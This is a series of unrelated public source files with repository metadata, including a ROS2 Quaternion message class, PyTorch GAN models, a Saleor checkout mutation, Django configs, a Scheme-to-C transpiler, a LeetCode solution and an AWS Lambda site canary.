meta.concreteSubClasses.add("cobra.model.rtpfx.Rule")
meta.concreteSubClasses.add("cobra.model.rtregcom.Rule")
meta.concreteSubClasses.add("cobra.model.rtmap.Rule")
meta.concreteSubClasses.add("cobra.model.rtextcom.Rule")
meta.rnPrefixes = [
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "name", "name", 3682, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
def __init__(self, parentMoOrDn, markDirty=True, **creationProps):
namingVals = []
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
|
[
"rrishike@cisco.com"
] |
rrishike@cisco.com
|
5eedc1be3759f58a0165ca8beeea10d2d67d05cc
|
4bab98acf65c4625a8b3c757327a8a386f90dd32
|
/ros2-windows/Lib/site-packages/geometry_msgs/msg/_quaternion.py
|
012d2c21882f9d81a43e5720d9d1c8ee58681265
|
[] |
no_license
|
maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP
|
e2afb08b8d7b3ac075e071e063229f76b25f883a
|
8ed707edb72692698f270317113eb215b57ae9f9
|
refs/heads/master
| 2023-01-15T06:00:22.844468
| 2020-11-25T04:16:15
| 2020-11-25T04:16:15
| 289,108,482
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,369
|
py
|
# generated from rosidl_generator_py/resource/_idl.py.em
# with input from geometry_msgs:msg\Quaternion.idl
# generated code does not contain a copyright notice
# Import statements for member types
import rosidl_parser.definition # noqa: E402, I100
class Metaclass_Quaternion(type):
"""Metaclass of message 'Quaternion'."""
_CREATE_ROS_MESSAGE = None
_CONVERT_FROM_PY = None
_CONVERT_TO_PY = None
_DESTROY_ROS_MESSAGE = None
_TYPE_SUPPORT = None
__constants = {
}
@classmethod
def __import_type_support__(cls):
try:
from rosidl_generator_py import import_type_support
module = import_type_support('geometry_msgs')
except ImportError:
import logging
import traceback
logger = logging.getLogger(
'geometry_msgs.msg.Quaternion')
logger.debug(
'Failed to import needed modules for type support:\n' +
traceback.format_exc())
else:
cls._CREATE_ROS_MESSAGE = module.create_ros_message_msg__msg__quaternion
cls._CONVERT_FROM_PY = module.convert_from_py_msg__msg__quaternion
cls._CONVERT_TO_PY = module.convert_to_py_msg__msg__quaternion
cls._TYPE_SUPPORT = module.type_support_msg__msg__quaternion
cls._DESTROY_ROS_MESSAGE = module.destroy_ros_message_msg__msg__quaternion
@classmethod
def __prepare__(cls, name, bases, **kwargs):
# list constant names here so that they appear in the help text of
# the message class under "Data and other attributes defined here:"
# as well as populate each message instance
return {
'X__DEFAULT': 0.0,
'Y__DEFAULT': 0.0,
'Z__DEFAULT': 0.0,
'W__DEFAULT': 1.0,
}
@property
def X__DEFAULT(cls):
"""Return default value for message field 'x'."""
return 0.0
@property
def Y__DEFAULT(cls):
"""Return default value for message field 'y'."""
return 0.0
@property
def Z__DEFAULT(cls):
"""Return default value for message field 'z'."""
return 0.0
@property
def W__DEFAULT(cls):
"""Return default value for message field 'w'."""
return 1.0
class Quaternion(metaclass=Metaclass_Quaternion):
"""Message class 'Quaternion'."""
__slots__ = [
'_x',
'_y',
'_z',
'_w',
]
_fields_and_field_types = {
'x': 'double',
'y': 'double',
'z': 'double',
'w': 'double',
}
SLOT_TYPES = (
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
)
def __init__(self, **kwargs):
assert all('_' + key in self.__slots__ for key in kwargs.keys()), \
'Invalid arguments passed to constructor: %s' % \
', '.join(sorted(k for k in kwargs.keys() if '_' + k not in self.__slots__))
self.x = kwargs.get(
'x', Quaternion.X__DEFAULT)
self.y = kwargs.get(
'y', Quaternion.Y__DEFAULT)
self.z = kwargs.get(
'z', Quaternion.Z__DEFAULT)
self.w = kwargs.get(
'w', Quaternion.W__DEFAULT)
def __repr__(self):
typename = self.__class__.__module__.split('.')
typename.pop()
typename.append(self.__class__.__name__)
args = []
for s, t in zip(self.__slots__, self.SLOT_TYPES):
field = getattr(self, s)
fieldstr = repr(field)
# We use Python array type for fields that can be directly stored
# in them, and "normal" sequences for everything else. If it is
# a type that we store in an array, strip off the 'array' portion.
if (
isinstance(t, rosidl_parser.definition.AbstractSequence) and
isinstance(t.value_type, rosidl_parser.definition.BasicType) and
t.value_type.typename in ['float', 'double', 'int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64']
):
if len(field) == 0:
fieldstr = '[]'
else:
assert fieldstr.startswith('array(')
prefix = "array('X', "
suffix = ')'
fieldstr = fieldstr[len(prefix):-len(suffix)]
args.append(s[1:] + '=' + fieldstr)
return '%s(%s)' % ('.'.join(typename), ', '.join(args))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if self.x != other.x:
return False
if self.y != other.y:
return False
if self.z != other.z:
return False
if self.w != other.w:
return False
return True
@classmethod
def get_fields_and_field_types(cls):
from copy import copy
return copy(cls._fields_and_field_types)
@property
def x(self):
"""Message field 'x'."""
return self._x
@x.setter
def x(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'x' field must be of type 'float'"
self._x = value
@property
def y(self):
"""Message field 'y'."""
return self._y
@y.setter
def y(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'y' field must be of type 'float'"
self._y = value
@property
def z(self):
"""Message field 'z'."""
return self._z
@z.setter
def z(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'z' field must be of type 'float'"
self._z = value
@property
def w(self):
"""Message field 'w'."""
return self._w
@w.setter
def w(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'w' field must be of type 'float'"
self._w = value
|
[
"aidencfarrar@gmail.com"
] |
aidencfarrar@gmail.com
|
2befce3106817fc0f55d94063b2ac6ba3355720f
|
d8edd97f8f8dea3f9f02da6c40d331682bb43113
|
/networks371.py
|
69994056fe8fa748472cd893751fdb81bc410798
|
[] |
no_license
|
mdubouch/noise-gan
|
bdd5b2fff3aff70d5f464150443d51c2192eeafd
|
639859ec4a2aa809d17eb6998a5a7d217559888a
|
refs/heads/master
| 2023-07-15T09:37:57.631656
| 2021-08-27T11:02:45
| 2021-08-27T11:02:45
| 284,072,311
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,082
|
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
super().__init__()
self.ngf = ngf
self.seq_len = seq_len
self.version = __version__
# Input: (B, latent_dims, 1)
self.act = nn.ReLU()
self.lin0 = nn.Linear(latent_dims, seq_len//64*1024, bias=True)
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
self.bnu = nn.BatchNorm1d(out_channels)
self.bn1 = nn.BatchNorm1d(out_channels)
self.act = nn.ReLU()
def forward(self, x):
y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
y = self.act(self.bnu(self.convu(x)))
y = self.act(y0 + self.bn1(self.conv1(y)))
return y
self.gb1 = GBlock(1024, 768)
self.gb2 = GBlock(768, 512)
self.gb3 = GBlock(512, 384)
self.gb4 = GBlock(384, 256)
self.gb5 = GBlock(256, 256)
self.gb6 = GBlock(256, 256)
self.convw1 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw1 = nn.InstanceNorm1d(256)
self.convw2 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw2 = nn.InstanceNorm1d(256)
self.convw3 = nn.ConvTranspose1d(256, n_wires, 3, 1, 1)
#self.bnp0 = nn.BatchNorm1d(n_wires)
self.convwp = nn.ConvTranspose1d(256, 64, 1, 1, 0)
self.convp1 = nn.ConvTranspose1d(2, 64, 3, 1, 1)
self.bnp1 = nn.BatchNorm1d(64)
self.convp2 = nn.ConvTranspose1d(64, 32, 3, 1, 1)
self.bnp2 = nn.BatchNorm1d(32)
self.convp3 = nn.ConvTranspose1d(32, n_features, 1, 1, 0)
self.out = nn.Tanh()
def forward(self, z, wire_to_xy):
# z: random point in latent space
x = self.act(self.lin0(z).view(-1, 1024, self.seq_len // 64))
x = self.gb1(x)
x = self.gb2(x)
x = self.gb3(x)
x = self.gb4(x)
x = self.gb5(x)
x = self.gb6(x)
w = self.bnw1(self.act(self.convw1(x)))
w = self.bnw2(self.act(self.convw2(w)))
w = self.convw3(w)
wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)
p = self.act(self.bnp1(self.convwp(x) + self.convp1(xy)))
p = self.act(self.bnp2(self.convp2(p)))
p = self.convp3(p)
return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
def __init__(self, ndf, seq_len, encoded_dim):
super().__init__()
self.version = __version__
# (B, n_features, 256)
self.act = nn.LeakyReLU(0.2)
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convd = nn.Conv1d(in_channels, out_channels, 4, 2, 1)
self.act = nn.LeakyReLU(0.2)
def forward(self, x):
y = self.act(self.convd(x))
return y
self.conv0 = nn.Conv1d(2, 64, 1, 1, 0)
self.conv1 = nn.Conv1d(64, 128, 1, 1, 0)
self.conv2 = nn.Conv1d(128, 256, 1, 1, 0)
self.conv3 = nn.Conv1d(256, 256, 1, 1, 0)
self.conv4 = nn.Conv1d(256, 256, 1, 1, 0)
#self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
self.convf = nn.Conv1d(256, 1, 1, 1, 0)
self.out = nn.Identity()
def forward(self, x_):
# x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
# p_ shape is (batch, features, seq_len),
# w_ is AE-encoded wire (batch, encoded_dim, seq_len)
seq_len = x_.shape[2]
x = x_
#dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)
p = x[:,:n_features]
w = x[:,n_features:]
#x = torch.cat([p, w], dim=1)
x = self.act(self.conv0(w))
x = self.act(self.conv1(x))
x = self.act(self.conv2(x))
x = self.act(self.conv3(x))
x = self.act(self.conv4(x))
#x = self.lin0(x.flatten(1,2))
x = self.convf(x)
x = x.mean(2)
return self.out(x)#.squeeze(1)
class VAE(nn.Module):
def __init__(self, encoded_dim):
super().__init__()
class Enc(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.LeakyReLU(0.2)
self.lin1 = nn.Linear(n_wires, hidden_size)
self.lin2 = nn.Linear(hidden_size, encoded_dim)
self.out = nn.Tanh()
def forward(self, x):
x = self.act(self.lin1(x))
return self.out(self.lin2(x))
class Dec(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.ReLU()
self.lin1 = nn.Linear(encoded_dim, hidden_size)
self.lin2 = nn.Linear(hidden_size, n_wires)
def forward(self, x):
x = self.act(self.lin1(x))
return self.lin2(x)
self.enc_net = Enc(512)
self.dec_net = Dec(512)
def enc(self, x):
return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)
def dec(self, x):
return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)
def forward(self, x):
y = self.dec_net(self.enc_net(x))
return y
def get_n_params(model):
return sum(p.reshape(-1).shape[0] for p in model.parameters())
|
[
"m.dubouchet18@imperial.ac.uk"
] |
m.dubouchet18@imperial.ac.uk
|
c79fdf679e8dbf8e013d21dbb90d7bd6b3a07be2
|
84c4474a88a59da1e72d86b33b5326003f578271
|
/saleor/graphql/checkout/mutations/checkout_line_delete.py
|
68358da32752ad166cc6b8b7cdce9fa3ba1035cd
|
[
"BSD-3-Clause"
] |
permissive
|
vineetb/saleor
|
052bd416d067699db774f06453d942cb36c5a4b7
|
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
|
refs/heads/main
| 2023-07-20T02:01:28.338748
| 2023-07-17T06:05:36
| 2023-07-17T06:05:36
| 309,911,573
| 0
| 0
|
NOASSERTION
| 2020-11-04T06:32:55
| 2020-11-04T06:32:55
| null |
UTF-8
|
Python
| false
| false
| 2,754
|
py
|
import graphene
from ....checkout.fetch import fetch_checkout_info, fetch_checkout_lines
from ....checkout.utils import invalidate_checkout_prices
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout, CheckoutLine
from .utils import get_checkout, update_checkout_shipping_method_if_invalid
class CheckoutLineDelete(BaseMutation):
checkout = graphene.Field(Checkout, description="An updated checkout.")
class Arguments:
id = graphene.ID(
description="The checkout's ID." + ADDED_IN_34,
required=False,
)
token = UUID(
description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
required=False,
)
checkout_id = graphene.ID(
required=False,
description=(
f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
),
)
line_id = graphene.ID(description="ID of the checkout line to delete.")
class Meta:
description = "Deletes a CheckoutLine."
doc_category = DOC_CATEGORY_CHECKOUT
error_type_class = CheckoutError
error_type_field = "checkout_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.CHECKOUT_UPDATED,
description="A checkout was updated.",
)
]
@classmethod
def perform_mutation( # type: ignore[override]
cls,
_root,
info: ResolveInfo,
/,
*,
checkout_id=None,
id=None,
line_id,
token=None,
):
checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)
line = cls.get_node_or_error(
info, line_id, only_type=CheckoutLine, field="line_id"
)
if line and line in checkout.lines.all():
line.delete()
manager = get_plugin_manager_promise(info.context).get()
lines, _ = fetch_checkout_lines(checkout)
checkout_info = fetch_checkout_info(checkout, lines, manager)
update_checkout_shipping_method_if_invalid(checkout_info, lines)
invalidate_checkout_prices(checkout_info, lines, manager, save=True)
cls.call_event(manager.checkout_updated, checkout)
return CheckoutLineDelete(checkout=checkout)
|
[
"noreply@github.com"
] |
vineetb.noreply@github.com
|
d4077d7a3d2d6d62fed0c16b5ce02065c265119b
|
ecd25c36474ecf404a32f2f0096b5a6898e4c396
|
/python_stack/django/django_fullstack/semi_restful_tvshows/semi_restful_tvshows_app/migrations/0001_initial.py
|
68344c74cee04d8e0afc825cf43c38bae81458fc
|
[] |
no_license
|
matthew-le/Coding_Dojo_Bootcamp
|
cd7b4aa8e231db372da05a0a5444114b07fbfabf
|
6d433d5305d2d8f4ea485206895d8f84bedeb59d
|
refs/heads/main
| 2023-06-13T23:05:23.827556
| 2021-07-23T23:56:35
| 2021-07-23T23:56:35
| 388,947,581
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# Generated by Django 2.2 on 2021-07-11 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('network', models.CharField(max_length=255)),
('release_date', models.DateTimeField()),
('desc', models.TextField()),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
b8749e25c58da9a903feb5edc84c2d6ed8ebda67
|
04b1803adb6653ecb7cb827c4f4aa616afacf629
|
/third_party/blink/web_tests/external/wpt/bluetooth/generate_test.py
|
881f7dbcb73af73b18b447f5cea142f53ba2fd36
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
Samsung/Castanets
|
240d9338e097b75b3f669604315b06f7cf129d64
|
4896f732fc747dfdcfcbac3d442f2d2d42df264a
|
refs/heads/castanets_76_dev
| 2023-08-31T09:01:04.744346
| 2021-07-30T04:56:25
| 2021-08-11T05:45:21
| 125,484,161
| 58
| 49
|
BSD-3-Clause
| 2022-10-16T19:31:26
| 2018-03-16T08:07:37
| null |
UTF-8
|
Python
| false
| false
| 1,927
|
py
|
#!/usr/bin/python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# TODO(50903): Delete the file in LayoutTests/bluetooth after all the tests have
# been migrated to this directory.
"""Test that the set of gen-* files is the same as the generated files."""
import fnmatch
import os
import sys
import generate
import logging
UPDATE_TIP = 'To update the generated tests, run:\n' \
'$ python third_party/WebKit/LayoutTests/bluetooth/generate.py'
def main():
logging.basicConfig(level=logging.INFO)
logging.info(UPDATE_TIP)
generated_files = set()
# Tests data in gen-* files is the same as the data generated.
for generated_test in generate.GetGeneratedTests():
generated_files.add(generated_test.path)
try:
with open(generated_test.path, 'r') as f:
data = f.read().decode('utf-8')
if data != generated_test.data:
logging.error('%s does not match template', generated_test.path)
return -1
except IOError, e:
if e.errno == 2:
logging.error('Missing generated test:\n%s\nFor template:\n%s',
generated_test.path,
generated_test.template)
return -1
# Tests that there are no obsolete generated files.
previous_generated_files = set()
current_path = os.path.dirname(os.path.realpath(__file__))
for root, _, filenames in os.walk(current_path):
for filename in fnmatch.filter(filenames, 'gen-*.https.html'):
previous_generated_files.add(os.path.join(root, filename))
if previous_generated_files != generated_files:
logging.error('There are extra generated tests. Please remove them.')
for test_path in previous_generated_files - generated_files:
logging.error('%s', test_path)
return -1
if __name__ == '__main__':
sys.exit(main())
|
[
"sunny.nam@samsung.com"
] |
sunny.nam@samsung.com
|
f4d3f9c392925ef0d5946029ba07286699ed8e90
|
ed30d9b54ad58d2c134b465a3cb4008426aa6a72
|
/Transpile/transform_expression.py
|
48c255faed874ce20875362dc466e6685e7c4963
|
[] |
no_license
|
CaspianA1/S2CPP
|
b0a026356887f9e0590518db7f242cc8d97530fc
|
808c426c2784018efd507b207702494ac85beef1
|
refs/heads/master
| 2022-12-07T06:50:41.560949
| 2020-09-06T19:56:00
| 2020-09-06T19:56:00
| 287,172,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,510
|
py
|
# transform_expression.py
common_ends = {"+": "add", "-": "sub", "*": "mul", "/": "div"}
def function_is_present(function, scheme_expr):
for argument in scheme_expr:
if isinstance(argument, list):
return function_is_present(argument, scheme_expr)
elif argument == function:
return True
def make_c_expr(scheme_expr):
# if not isinstance(scheme_expr[0], str):
# return scheme_expr # for lists
c_expr = scheme_expr.pop(0) + "("
cast_to_floats = False
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
c_expr += make_c_expr(argument)
if index != len(scheme_expr) - 1:
c_expr += ", "
# print("C expression:", c_expr)
else:
if isinstance(argument, int) and cast_to_floats:
scheme_expr[index] = float(argument)
elif isinstance(argument, float):
cast_to_floats = True
c_expr += str(scheme_expr[index])
if index != len(scheme_expr) - 1:
c_expr += ", "
return c_expr + ")"
def make_float_funcs(scheme_expr):
for index, argument in enumerate(scheme_expr):
if (isinstance(argument, float) and scheme_expr[0] in common_ends.keys()) or scheme_expr[0] == "/":
return True
elif isinstance(argument, list):
return make_float_funcs(argument)
return False
# applies only to built-in math functions that need va_args
def make_ints_to_doubles(scheme_expr):
for index, argument in enumerate(scheme_expr):
if index == 1:
continue
elif isinstance(argument, int):
scheme_expr[index] = float(argument) # still floating-point
elif isinstance(argument, list):
scheme_expr[index] = make_ints_to_doubles(argument)
return scheme_expr
def modify_operators(scheme_expr, make_float_operators):
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
scheme_expr[index] = modify_operators(argument, make_float_operators)
elif index == 0 and (function := scheme_expr[0]) in common_ends.keys():
# modify the operators and make the arguments floats
scheme_expr[0] = common_ends[function]
if make_float_operators or function == "/":
make_ints_to_doubles(scheme_expr)
scheme_expr[0] += "_d"
return scheme_expr
if __name__ == "__main__":
# scheme_expr = ['define', 'f', ['lambda', ['x', 'y'], ['+', 'x', 'y', 1]]]
# scheme_expr = ['define', 'x', 5]
# scheme_expr = ['func', 5, ['*', 25, 14, ['/', 382, 90]]]
scheme_expr = ['define', 'x', 5]
scheme_expr = modify_operators(scheme_expr, make_float_funcs(scheme_expr))
c_expr = make_c_expr(scheme_expr)
print(c_expr)
|
[
"you@example.com"
] |
you@example.com
|
e07dde273c02119900fb16720a9652c7291bb2e1
|
b722b5a07cf9596b251e0148dd4e2358e1174071
|
/Intro to CS with Python/src/homework/listing1710.py
|
6628163a46b23740dca568e28043d497846523d9
|
[] |
no_license
|
p3ngwen/open-notes
|
7c894176ece3a1b8c2b1e2b336cdb3099d5d0f67
|
33679b64f5e77289798687337ef7db5503651c21
|
refs/heads/master
| 2023-07-08T02:43:59.431794
| 2021-08-10T16:34:56
| 2021-08-10T16:34:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 212
|
py
|
import errno
try:
fp = open( "NotAFile" )
fp.close()
except IOError as ex:
if ex.args[0] == errno.ENOENT:
print( "File not found!" )
else:
print( ex.args[0], ex.args[1] )
|
[
"6869736572@f-m.fm"
] |
6869736572@f-m.fm
|
5a931a1392b981326d9106633ad96940ac2d9671
|
8d5337e7132ae3980bda3bc0ed811207ca79b5b7
|
/search/icecreamParlour.py
|
a61e3f9004182b4836c1f518cb20e678620a38f0
|
[] |
no_license
|
thesharpshooter/hackerrank
|
16e7c565053a4d36f0a293c0f8af631cee591424
|
2cfec286e71465edd6603f6bcee608c764a086ec
|
refs/heads/master
| 2021-07-11T09:21:57.838631
| 2017-10-06T05:22:31
| 2017-10-06T05:22:31
| 104,779,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
def get(arr,m,n):
arr = sorted([[arr[i],i] for i in range(n)],key = lambda x :x[0])
i = 0
res = [None,None]
diff = float("inf")
while i < n-1 and arr[i][0] < m:
temp = m-arr[i][0]
j = i+1
while j < n and temp-arr[j][0]>=0:
if temp-arr[j][0] < diff:
diff = temp-arr[j][0]
res[0] = arr[j][1]
res[1] = arr[i][1]
if diff == 0:
break
j += 1
i += 1
return res
t = int(raw_input())
for i in range(t):
m = int(raw_input())
n = int(raw_input())
arr = map(int,raw_input().split())
res = get(arr,m,n)
print min(res)+1,max(res)+1
|
[
"prakash9266@gmail.com"
] |
prakash9266@gmail.com
|
5f86e01d9b34bd9ecb0e5f8495151675c3e1367b
|
10bf47e8efe8a6e2eb2e237c5634471ba461483b
|
/voting/urls.py
|
8a998b355a2327ae6453160d9b047e40717c72e5
|
[] |
no_license
|
swciitg/IITG_General_Elections
|
d9d4001fa8b65feabc79284ae1df7d078e089712
|
e35e29a1f91e07f3499a5613c091db28b2a07656
|
refs/heads/master
| 2020-05-06T15:31:00.797537
| 2019-04-08T08:02:41
| 2019-04-08T08:02:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 987
|
py
|
"""voting URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import include, url
from . import views
urlpatterns = [
# url(r'^$',views.siteindex,name="siteindex"),
url('general_elections/', include('general_elections.urls')),
url(r'^authentication/', include('authentication.urls', namespace='authentication')),
url('admin/', admin.site.urls),
]
|
[
"beingtmk@gmail.com"
] |
beingtmk@gmail.com
|
d9f83c10fa19003084ba46e89c00610f56fc49a9
|
9b4fe9c2693abc6ecc614088665cbf855971deaf
|
/881.boats-to-save-people.py
|
b1ee51a5ebe9936be3be41a07b61386d05ccc993
|
[
"MIT"
] |
permissive
|
windard/leeeeee
|
e795be2b9dcabfc9f32fe25794878e591a6fb2c8
|
0dd67edca4e0b0323cb5a7239f02ea46383cd15a
|
refs/heads/master
| 2022-08-12T19:51:26.748317
| 2022-08-07T16:01:30
| 2022-08-07T16:01:30
| 222,122,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,834
|
py
|
#
# @lc app=leetcode id=881 lang=python
#
# [881] Boats to Save People
#
# https://leetcode.com/problems/boats-to-save-people/description/
#
# algorithms
# Medium (42.90%)
# Total Accepted: 12.4K
# Total Submissions: 28.9K
# Testcase Example: '[1,2]\n3'
#
# The i-th person has weight people[i], and each boat can carry a maximum
# weight of limit.
#
# Each boat carries at most 2 people at the same time, provided the sum of the
# weight of those people is at most limit.
#
# Return the minimum number of boats to carry every given person. (It is
# guaranteed each person can be carried by a boat.)
#
#
#
#
# Example 1:
#
#
# Input: people = [1,2], limit = 3
# Output: 1
# Explanation: 1 boat (1, 2)
#
#
#
# Example 2:
#
#
# Input: people = [3,2,2,1], limit = 3
# Output: 3
# Explanation: 3 boats (1, 2), (2) and (3)
#
#
#
# Example 3:
#
#
# Input: people = [3,5,3,4], limit = 5
# Output: 4
# Explanation: 4 boats (3), (3), (4), (5)
#
# Note:
#
#
# 1 <= people.length <= 50000
# 1 <= people[i] <= limit <= 30000
#
#
#
#
#
#
class Solution(object):
def numRescueBoats(self, people, limit):
"""
:type people: List[int]
:type limit: int
:rtype: int
"""
# 两人乘船问题就是贪心算法
# 三人或更多,则是回溯加贪心算法
people.sort()
first = 0
last = len(people) - 1
times = 0
while first <= last:
if last == first:
times += 1
break
if people[first] + people[last] <= limit:
times += 1
first += 1
last -= 1
elif people[first] > limit:
times += last - first
else:
times += 1
last -= 1
return times
|
[
"windard@qq.com"
] |
windard@qq.com
|
84d04e0a67a92315abff10fcedcff85bbe31b3a0
|
9a819fc91e17ef9a44e45cf68e76cf696381d06d
|
/Lambda/canary.py
|
03732e914a31ca284fdfaa6e38ee4352ac56a773
|
[] |
no_license
|
Gautam3994/Dark-Knight
|
aef1d6383e0785130db75e80ed40f544a120579e
|
327b2d58851a42da1b707addea73e40fac6a61cc
|
refs/heads/master
| 2022-12-01T11:58:39.857379
| 2020-09-05T18:07:51
| 2020-09-05T18:07:55
| 203,866,327
| 0
| 1
| null | 2022-11-24T09:16:18
| 2019-08-22T20:14:43
|
Python
|
UTF-8
|
Python
| false
| false
| 598
|
py
|
import requests
import os
import datetime
SITE = os.environ['site']
EXPECTED = os.environ['expected']
def validate(res):
return EXPECTED in res
def lambda_handler(event, context):
print(f"Test the site{SITE} at the time {event['time']}")
response = requests.get(url="https://www.amazon.in", headers={'User-Agent': 'AWS Lambda'})
try:
if not validate(response.text):
raise Exception("Validation failed")
except:
print("Check failed")
else:
print("okay")
finally:
print(f"Check complete at {str(datetime.datetime.now())}")
|
[
"gautam3994@gmail.com"
] |
gautam3994@gmail.com
|
3159b23be1a8a592afc5451129094bdd839623f7
|
34f6120035bfea1f675eb5dd98d59e81209d5c5e
|
/h2o-py/tests/testdir_algos/gbm/pyunit_weights_var_impGBM.py
|
7ea27aa39c4127b00f5a8f9a0451c30aaf0009ea
|
[
"Apache-2.0"
] |
permissive
|
Pure-Mind/h2o-3
|
f5b5b0bf3d2856fee0719adf2754c1af719e5950
|
508ad0e28f40f537e906a372a2760ca6730ebe94
|
refs/heads/master
| 2021-01-17T22:56:02.372211
| 2015-08-09T02:52:34
| 2015-08-09T03:31:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
import sys
sys.path.insert(1, "../../../")
import h2o
import random
